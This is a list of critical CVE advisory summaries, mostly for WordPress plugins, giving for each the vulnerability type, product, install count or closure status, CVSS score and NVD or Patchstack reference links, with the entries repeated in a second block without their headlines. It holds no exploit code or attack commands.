CVE-2024-8972 - Mobil365 Informatics Saha365 App is vulnerable to SQL Injection before 30.09.2024.

Product: Mobil365 Informatics Saha365 App

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8972

NVD References: https://www.usom.gov.tr/bildirim/tr-24-1890

CVE-2024-11015 - The Sign In With Google plugin for WordPress is vulnerable to authentication bypass, allowing unauthenticated attackers to log in as the first user who signed in using Google OAuth.

Product: Sign In With Google plugin

Active Installations: This plugin has been closed as of December 10, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11015

NVD References:

- https://plugins.trac.wordpress.org/browser/sign-in-with-google/trunk/src/admin/class-sign-in-with-google-admin.php#L525

- https://www.wordfence.com/threat-intel/vulnerabilities/id/afe894b0-5e91-4aa2-bbd1-1f74274701cf?source=cve

CVE-2024-10124 - The Vayu Blocks plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation, enabling unauthenticated attackers to achieve remote code execution.

Product: Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce

Active Installations: 1,000+

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10124

NVD References:

- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L28

- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L46

- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/core/class-installation.php#L29

- https://plugins.trac.wordpress.org/changeset/3173408/

- https://plugins.trac.wordpress.org/changeset/3203532/vayu-blocks/tags/1.2.0/inc/vayu-sites/app.php

- https://www.wordfence.com/threat-intel/vulnerabilities/id/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cve

CVE-2024-9290 - The Super Backup & Clone - Migrate for WordPress plugin is vulnerable to arbitrary file uploads, allowing unauthenticated attackers to upload files and potentially execute remote code.

Product: Super Backup & Clone - Migrate for WordPress

Active Installations: unknown

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-9290

NVD References:

- https://codecanyon.net/item/super-backup-clone-migrate-for-wordpress/12943030

- https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=cve

CVE-2022-46838 - JS Help Desk – Best Help Desk & Support Plugin is vulnerable to missing authorization, allowing for exploitation of incorrectly configured access control security levels.

Product: JS Help Desk – Best Help Desk & Support Plugin

Active Installations: 5,000+

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-46838

NVD References: https://patchstack.com/database/wordpress/plugin/js-support-ticket/vulnerability/wordpress-js-help-desk-plugin-2-7-1-unauthenticated-settings-change-vulnerability?_s_id=cve

CVE-2024-54239 - Missing Authorization vulnerability in dugudlabs Eyewear prescription form allows Privilege Escalation.This issue affects Eyewear prescription form: from n/a through 4.0.18.

Product: dugudlabs Eyewear prescription form

Active Installations: This extension has been closed as of December 6, 2024 and is not available for download. The closure is temporary, pending a full review.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54239

NVD References: https://patchstack.com/database/wordpress/plugin/eyewear-prescription-form/vulnerability/wordpress-eyewear-prescription-form-plugin-4-0-18-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve

CVE-2024-54296 - CoSchool LMS by Codexpert, Inc is vulnerable to Authentication Bypass via an Alternate Path or Channel from version n/a through 1.2.

Product: Codexpert Inc, CoSchool LMS

Active Installations: This plugin has been closed as of November 8, 2024, and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54296

NVD References: https://patchstack.com/database/wordpress/plugin/coschool/vulnerability/wordpress-coschool-lms-plugin-1-2-account-takeover-vulnerability?_s_id=cve

CVE-2024-54297 - vBSSO-lite allows Authentication Bypass via an alternate path or channel in www.vbsso.com versions n/a through 1.4.3.

Product: vBSSO-lite

Active Installations: 6,000+

CVSS Score: 9.8 AtRiskScore 30

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54297

NVD References: https://patchstack.com/database/wordpress/plugin/vbsso-lite/vulnerability/wordpress-vbsso-lite-plugin-1-4-3-account-takeover-vulnerability?_s_id=cve

CVE-2024-54361 - Instant Appointment suffers from an SQL Injection vulnerability in versions n/a through 1.2, allowing for improper neutralization of special elements in SQL commands.

Product: outstrip Instant Appointment

Active Installations: This plugin has been closed as of November 5, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54361

NVD References: https://patchstack.com/database/wordpress/plugin/instant-appointment/vulnerability/wordpress-instant-appointment-plugin-1-2-sql-injection-vulnerability?_s_id=cve

CVE-2024-54363 - Wp NssUser Register is vulnerable to Incorrect Privilege Assignment, allowing Privilege Escalation in versions from n/a through 1.0.0.

Product: nssTheme Wp NssUser Register

Active Installations: unknown

CVSS Score: 9.8 AtRiskScore 30

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54363

NVD References: https://patchstack.com/database/wordpress/plugin/wp-nssuser-register/vulnerability/wordpress-wp-nssuser-register-plugin-1-0-0-privilege-escalation-vulnerability?_s_id=cve

CVE-2024-54367 - Deserialization of Untrusted Data vulnerability in ForumWP ForumWP allows Object Injection.This issue affects ForumWP: from n/a through 2.1.0.

Product: ForumWP

Active Installations: 1,000+

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54367

NVD References: https://patchstack.com/database/wordpress/plugin/forumwp/vulnerability/wordpress-forumwp-plugin-2-1-0-php-object-injection-vulnerability?_s_id=cve

CVE-2024-54369 - Zita Site Builder versions from n/a through 1.0.2 are vulnerable to Missing Authorization, allowing unauthorized access to functionalities not restricted by ACLs.

Product: ThemeHunk Zita Site Builder

Active Installations: This plugin has been closed as of November 6, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54369

NVD References: https://patchstack.com/database/wordpress/plugin/ai-site-builder/vulnerability/wordpress-zita-site-builder-plugin-1-0-2-arbitrary-plugin-installation-and-activation-vulnerability?_s_id=cve

CVE-2024-54372 - Cross-Site Request Forgery (CSRF) vulnerability in Sourov Amin Insertify allows Code Injection.This issue affects Insertify: from n/a through 1.1.4.

Product: Sourov Amin Insertify

Active Installations: This plugin has been closed as of October 21, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.6

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54372

NVD References: https://patchstack.com/database/wordpress/plugin/insertify/vulnerability/wordpress-insertify-plugin-1-1-4-csrf-to-remote-code-execution-vulnerability?_s_id=cve

CVE-2024-55976 - Mike Leembruggen Critical Site Intel is vulnerable to SQL Injection, allowing attackers to manipulate SQL commands from version n/a through 1.0.

Product: Mike Leembruggen Critical Site Intel

Active Installations: unknown

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55976

NVD References: https://patchstack.com/database/wordpress/plugin/critical-site-intel-stats/vulnerability/wordpress-critical-site-intel-plugin-1-0-sql-injection-vulnerability?_s_id=cve

CVE-2024-55977 - LaunchPage.app Importer allows SQL Injection from n/a through 1.1.

Product: LaunchPage.app Importer

Active Installations: unknown

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55977

NVD References: https://patchstack.com/database/wordpress/plugin/launchpage-app-importer/vulnerability/wordpress-launchpage-app-importer-plugin-1-1-sql-injection-vulnerability?_s_id=cve

CVE-2024-55981 - Nabz Image Gallery is vulnerable to SQL Injection from n/a through v1.00.

Product: Nabajit Roy Nabz Image Gallery

Active Installations: This plugin has been closed as of October 30, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55981

NVD References: https://patchstack.com/database/wordpress/plugin/nabz-image-gallery/vulnerability/wordpress-nabz-image-gallery-plugin-v1-00-sql-injection-vulnerability?_s_id=cve

CVE-2024-55982 - Share Buttons – Social Media allows Blind SQL Injection from n/a through 1.0.2.

Product: richteam Share Buttons – Social Media

Active Installations: unknown

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55982

NVD References: https://patchstack.com/database/wordpress/plugin/rich-web-share-button/vulnerability/wordpress-share-buttons-social-media-plugin-1-0-2-sql-injection-vulnerability-2?_s_id=cve

CVE-2024-55988 - Navayan CSV Export is vulnerable to Blind SQL Injection due to improper neutralization of special elements in an SQL command, affecting versions from n/a through 1.0.9.

Product: Amol Nirmala Waman Navayan CSV Export

Active Installations: This plugin has been closed as of December 5, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55988

NVD References: https://patchstack.com/database/wordpress/plugin/navayan-csv-export/vulnerability/wordpress-navayan-csv-export-plugin-1-0-9-sql-injection-vulnerability?_s_id=cve

CVE-2024-56012 - Pearlbells Flash News / Post (Responsive) is vulnerable to CSRF allowing Privilege Escalation from versions n/a through 4.1.

Product: Pearlbells Flash News / Post

Active Installations: This plugin has been closed as of October 15, 2024 and is not available for download. Reason: Security Issue.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56012

NVD References: https://patchstack.com/database/wordpress/plugin/flashnews-fading-effect-pearlbells/vulnerability/wordpress-flash-news-post-responsive-plugin-4-1-csrf-to-privilege-escalation-vulnerability?_s_id=cve

CVE-2024-43234 - Woffice is vulnerable to authentication bypass via an alternate path or channel, impacting versions from n/a through 5.4.14.

Product: Envato Woffice

Active Installations: unknown

CVSS Score: 9.8 AtRiskScore 30

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43234

NVD References: https://patchstack.com/database/wordpress/theme/woffice/vulnerability/wordpress-woffice-theme-5-4-14-unauthenticated-account-takeover-vulnerability?_s_id=cve

CVE-2024-54229 - Incorrect Privilege Assignment vulnerability in Straightvisions GmbH SV100 Companion allows Privilege Escalation.This issue affects SV100 Companion: from n/a through 2.0.02.

Product: Straightvisions GmbH SV100 Companion

Active Installations: This plugin has been closed as of December 5, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54229

NVD References: https://patchstack.com/database/wordpress/plugin/sv100-companion/vulnerability/wordpress-sv100-companion-plugin-2-0-02-privilege-escalation-vulnerability?_s_id=cve

CVE-2024-54280 - WPBookit is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, impacting versions from n/a through 1.6.0.

Product: Iqonic Design WPBookit

Active Installations: unknown

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54280

NVD References: https://patchstack.com/database/wordpress/plugin/wpbookit/vulnerability/wordpress-wpbookit-plugin-1-6-0-sql-injection-vulnerability?_s_id=cve

CVE-2024-54285 - SeedProd Pro is vulnerable to unrestricted upload of files with dangerous types, allowing attackers to upload web shells to a web server.

Product: SeedProd LLC SeedProd Pro

Active Installations: 800,000+

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54285

NVD References: https://patchstack.com/database/wordpress/plugin/seedprod-coming-soon-pro-5/vulnerability/wordpress-seedprod-pro-plugin-6-18-10-remote-code-execution-rce-vulnerability?_s_id=cve

Product: Mobil365 Informatics Saha365 App

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8972

NVD References: https://www.usom.gov.tr/bildirim/tr-24-1890

Product: Sign In With Google plugin

Active Installations: This plugin has been closed as of December 10, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11015

NVD References:

- https://plugins.trac.wordpress.org/browser/sign-in-with-google/trunk/src/admin/class-sign-in-with-google-admin.php#L525

- https://www.wordfence.com/threat-intel/vulnerabilities/id/afe894b0-5e91-4aa2-bbd1-1f74274701cf?source=cve

Product: Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce

Active Installations: 1,000+

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10124

NVD References:

- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L28

- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L46

- https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/core/class-installation.php#L29

- https://plugins.trac.wordpress.org/changeset/3173408/

- https://plugins.trac.wordpress.org/changeset/3203532/vayu-blocks/tags/1.2.0/inc/vayu-sites/app.php

- https://www.wordfence.com/threat-intel/vulnerabilities/id/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cve

Product: Super Backup & Clone - Migrate for WordPress

Active Installations: unknown

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-9290

NVD References:

- https://codecanyon.net/item/super-backup-clone-migrate-for-wordpress/12943030

- https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=cve

Product: JS Help Desk – Best Help Desk & Support Plugin

Active Installations: 5,000+

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-46838

NVD References: https://patchstack.com/database/wordpress/plugin/js-support-ticket/vulnerability/wordpress-js-help-desk-plugin-2-7-1-unauthenticated-settings-change-vulnerability?_s_id=cve

Product: dugudlabs Eyewear prescription form

Active Installations: This extension has been closed as of December 6, 2024 and is not available for download. The closure is temporary, pending a full review.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54239

NVD References: https://patchstack.com/database/wordpress/plugin/eyewear-prescription-form/vulnerability/wordpress-eyewear-prescription-form-plugin-4-0-18-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve

Product: Codexpert Inc, CoSchool LMS

Active Installations: This plugin has been closed as of November 8, 2024, and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54296

NVD References: https://patchstack.com/database/wordpress/plugin/coschool/vulnerability/wordpress-coschool-lms-plugin-1-2-account-takeover-vulnerability?_s_id=cve

Product: vBSSO-lite

Active Installations: 6,000+

CVSS Score: 9.8 AtRiskScore 30

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54297

NVD References: https://patchstack.com/database/wordpress/plugin/vbsso-lite/vulnerability/wordpress-vbsso-lite-plugin-1-4-3-account-takeover-vulnerability?_s_id=cve

Product: outstrip Instant Appointment

Active Installations: This plugin has been closed as of November 5, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54361

NVD References: https://patchstack.com/database/wordpress/plugin/instant-appointment/vulnerability/wordpress-instant-appointment-plugin-1-2-sql-injection-vulnerability?_s_id=cve

Product: nssTheme Wp NssUser Register

Active Installations: unknown

CVSS Score: 9.8 AtRiskScore 30

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54363

NVD References: https://patchstack.com/database/wordpress/plugin/wp-nssuser-register/vulnerability/wordpress-wp-nssuser-register-plugin-1-0-0-privilege-escalation-vulnerability?_s_id=cve

Product: ForumWP

Active Installations: 1,000+

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54367

NVD References: https://patchstack.com/database/wordpress/plugin/forumwp/vulnerability/wordpress-forumwp-plugin-2-1-0-php-object-injection-vulnerability?_s_id=cve

Product: ThemeHunk Zita Site Builder

Active Installations: This plugin has been closed as of November 6, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54369

NVD References: https://patchstack.com/database/wordpress/plugin/ai-site-builder/vulnerability/wordpress-zita-site-builder-plugin-1-0-2-arbitrary-plugin-installation-and-activation-vulnerability?_s_id=cve

Product: Sourov Amin Insertify

Active Installations: This plugin has been closed as of October 21, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.6

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54372

NVD References: https://patchstack.com/database/wordpress/plugin/insertify/vulnerability/wordpress-insertify-plugin-1-1-4-csrf-to-remote-code-execution-vulnerability?_s_id=cve

Product: Mike Leembruggen Critical Site Intel

Active Installations: unknown

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55976

NVD References: https://patchstack.com/database/wordpress/plugin/critical-site-intel-stats/vulnerability/wordpress-critical-site-intel-plugin-1-0-sql-injection-vulnerability?_s_id=cve

Product: LaunchPage.app Importer

Active Installations: unknown

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55977

NVD References: https://patchstack.com/database/wordpress/plugin/launchpage-app-importer/vulnerability/wordpress-launchpage-app-importer-plugin-1-1-sql-injection-vulnerability?_s_id=cve

Product: Nabajit Roy Nabz Image Gallery

Active Installations: This plugin has been closed as of October 30, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55981

NVD References: https://patchstack.com/database/wordpress/plugin/nabz-image-gallery/vulnerability/wordpress-nabz-image-gallery-plugin-v1-00-sql-injection-vulnerability?_s_id=cve

Product: richteam Share Buttons – Social Media

Active Installations: unknown

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55982

NVD References: https://patchstack.com/database/wordpress/plugin/rich-web-share-button/vulnerability/wordpress-share-buttons-social-media-plugin-1-0-2-sql-injection-vulnerability-2?_s_id=cve

Product: Amol Nirmala Waman Navayan CSV Export

Active Installations: This plugin has been closed as of December 5, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-55988

NVD References: https://patchstack.com/database/wordpress/plugin/navayan-csv-export/vulnerability/wordpress-navayan-csv-export-plugin-1-0-9-sql-injection-vulnerability?_s_id=cve

Product: Pearlbells Flash News / Post

Active Installations: This plugin has been closed as of October 15, 2024 and is not available for download. Reason: Security Issue.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56012

NVD References: https://patchstack.com/database/wordpress/plugin/flashnews-fading-effect-pearlbells/vulnerability/wordpress-flash-news-post-responsive-plugin-4-1-csrf-to-privilege-escalation-vulnerability?_s_id=cve

Product: Envato Woffice

Active Installations: unknown

CVSS Score: 9.8 AtRiskScore 30

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43234

NVD References: https://patchstack.com/database/wordpress/theme/woffice/vulnerability/wordpress-woffice-theme-5-4-14-unauthenticated-account-takeover-vulnerability?_s_id=cve

Product: Straightvisions GmbH SV100 Companion

Active Installations: This plugin has been closed as of December 5, 2024 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54229

NVD References: https://patchstack.com/database/wordpress/plugin/sv100-companion/vulnerability/wordpress-sv100-companion-plugin-2-0-02-privilege-escalation-vulnerability?_s_id=cve

Product: Iqonic Design WPBookit

Active Installations: unknown

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54280

NVD References: https://patchstack.com/database/wordpress/plugin/wpbookit/vulnerability/wordpress-wpbookit-plugin-1-6-0-sql-injection-vulnerability?_s_id=cve

Product: SeedProd LLC SeedProd Pro

Active Installations: 800,000+

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-54285

NVD References: https://patchstack.com/database/wordpress/plugin/seedprod-coming-soon-pro-5/vulnerability/wordpress-seedprod-pro-plugin-6-18-10-remote-code-execution-rce-vulnerability?_s_id=cve